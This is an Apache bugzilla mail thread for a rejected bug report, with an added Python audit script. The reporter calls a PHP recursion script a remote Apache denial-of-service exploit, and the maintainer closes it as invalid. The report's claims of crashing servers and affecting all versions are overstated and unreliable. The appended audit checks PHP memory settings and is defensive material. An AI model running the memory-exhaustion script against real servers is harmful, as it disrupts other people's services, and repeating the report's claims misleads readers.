Posted to bugs@httpd.apache.org by bu...@apache.org on 2019/12/14 14:43:31 UTC
[Bug 64002] New: Apache2 HTTP PHP Denial Of Service
https://bz.apache.org/bugzilla/show_bug.cgi?id=64002
Bug ID: 64002
Summary: Apache2 HTTP PHP Denial Of Service
Product: Apache httpd-2
Version: 2.5-HEAD
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P2
Component: All
Assignee: bugs@httpd.apache.org
Reporter: alicangonullu@yahoo.com
Target Milestone: ---
> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
>
> # Exploit :
>
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
>     if ($n === 0) {
>         return 1;
>     } else {
>         $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
>         echo $hesap;
>     }
> }
> islem($sayi);
> ?>
>
> ------------------------------------------
>
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shut down.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
>
> ------------------------------------------
>
> [Vendor of Product]
> Apache
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Apache2 HTTP - All
>
> ------------------------------------------
>
> [Affected Component]
> Affected source code
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Open PHP file (in this code)
>
> ------------------------------------------
>
> [Discoverer]
> Ali Can Gonullu
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 64002] Apache2 HTTP PHP Denial Of Service
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=64002
Eric Covener <co...@gmail.com> changed:
      What|Removed                     |Added
----------------------------------------------------------------------------
Resolution|---                         |INVALID
    Status|NEW                         |RESOLVED
--- Comment #1 from Eric Covener <co...@gmail.com> ---
php/mod_php aren't maintained here.
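Added example, not part of the original thread or of any project's code: a small Python audit of the PHP settings the report turns on, checking whether `memory_limit` is unlimited and whether a script can still change it with `ini_set()`. The function names are hypothetical and the sample configurations are constructed; it assumes mod_php, where `php_admin_value` settings cannot be overridden by `ini_set()` or `.htaccess`.

```python
import re

# Constructed sample inputs (not taken from any real server).
WEAK_INI = "memory_limit = -1\ndisable_functions =\n"
HARDENED_INI = "memory_limit = 128M ; per-request cap\ndisable_functions = ini_set, ini_alter\n"
HARDENED_VHOST = "<VirtualHost *:80>\n    php_admin_value memory_limit 128M\n</VirtualHost>\n"

def parse_php_ini(text):
    """Return {directive: value} from php.ini text (last assignment wins)."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()      # ';' starts a comment
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip("\"'")
    return settings

def admin_pinned(apache_conf):
    """Directives fixed with php_admin_value / php_admin_flag in httpd config."""
    pat = re.compile(r"^\s*php_admin_(?:value|flag)\s+(\S+)\s+(\S+)", re.I | re.M)
    return {m.group(1).lower(): m.group(2).strip("\"'")
            for m in pat.finditer(apache_conf)}

def audit(php_ini, apache_conf=""):
    """Return a list of findings; an empty list means both checks pass."""
    ini = parse_php_ini(php_ini)
    pinned = admin_pinned(apache_conf)
    disabled = {f.strip().lower()
                for f in ini.get("disable_functions", "").split(",") if f.strip()}
    findings = []
    # A pinned value wins over php.ini; 128M is PHP's built-in default.
    limit = pinned.get("memory_limit", ini.get("memory_limit", "128M"))
    if limit == "-1":
        findings.append("memory_limit is unlimited")
    # ini_alter is an alias of ini_set, so both names are checked.
    if "memory_limit" not in pinned and not {"ini_set", "ini_alter"} <= disabled:
        findings.append("scripts can change memory_limit with ini_set()")
    return findings

if __name__ == "__main__":
    print(audit(WEAK_INI))                  # both findings
    print(audit(HARDENED_INI))              # no findings
    print(audit(WEAK_INI, HARDENED_VHOST))  # pinned by httpd config
```

Both controls are PHP settings rather than httpd features, which is consistent with the resolution recorded in the thread.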